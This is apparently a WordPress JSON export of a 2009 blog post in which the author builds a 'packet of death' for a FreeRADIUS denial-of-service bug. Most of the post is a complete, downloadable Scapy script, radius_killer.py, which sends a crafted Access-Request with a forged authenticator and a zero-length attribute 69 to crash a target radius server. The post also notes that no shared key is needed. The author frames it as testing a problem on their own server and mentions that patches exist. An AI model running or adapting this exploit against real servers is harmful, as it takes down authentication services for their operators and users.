{"id":105,"date":"2009-09-11T13:39:47","date_gmt":"2009-09-11T17:39:47","guid":{"rendered":"http:\/\/www.braindeadprojects.com\/blog\/?p=105"},"modified":"2010-03-10T18:19:46","modified_gmt":"2010-03-10T22:19:46","slug":"freeradius-packet-of-death","status":"publish","type":"post","link":"http:\/\/www.braindeadprojects.com\/blog\/what\/freeradius-packet-of-death\/","title":{"rendered":"Freeradius Packet of Death"},"content":{"rendered":"

I haven’t had a chance to use Scapy<\/a> in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping<\/a>. Scapy almost fits the bill.<\/p>\n

Earlier today, while reading through Full Disclosure<\/a>, I came across something interesting: a Freeradius DoS bug<\/a>. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)<\/p>\n

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac<\/a>.<\/p>\n

So, download the layer to scapy\/layers, ensure that it imports the required items:<\/p>\n

import struct
\nfrom scapy.packet import *
\nfrom scapy.fields import *
\nfrom scapy.layers.inet import UDP<\/p>\n

from scapy.layers.radius import Radius<\/p><\/blockquote>\n

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:<\/p>\n

#!\/usr\/bin\/env python
\n# FreeRadius Packet Of Death
\n# Matthew Gillespie 2009-09-11<\/p>\n

import sys
\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr<\/p>\n

if len(sys.argv) != 2:
\nprint “Usage: radius_killer.py <radiushost>\\n”
\nsys.exit(1)<\/p>\n

PoD=IP(dst=sys.argv[1])\/UDP(sport=60422,dport=1812)\/ \\
\nRadius(code=1,authenticator=”\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99″,id=180)\/ \\
\nRadiusAttr(type=69,value=””,len=2)<\/p>\n

send(PoD)<\/p><\/blockquote>\n

(download)<\/a><\/p>\n

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.<\/p>\n

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.\u00a0 Correct me if I’m wrong. Either way, updated packages are available.<\/p>\n

\n

\n

\"\"<\/a>
RIP Milw0rm<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"

I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill. Earlier today, while reading … Continue reading Freeradius Packet of Death<\/span> →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-105","post","type-post","status-publish","format-standard","hentry","category-what"],"_links":{"self":[{"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/posts\/105"}],"collection":[{"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/comments?post=105"}],"version-history":[{"count":12,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/posts\/105\/revisions"}],"predecessor-version":[{"id":114,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/posts\/105\/revisions\/114"}],"wp:attachment":[{"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/media?parent=105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/categories?post=105"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.braindeadprojects.com\/blog\/wp-json\/wp\/v2\/tags?post=105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}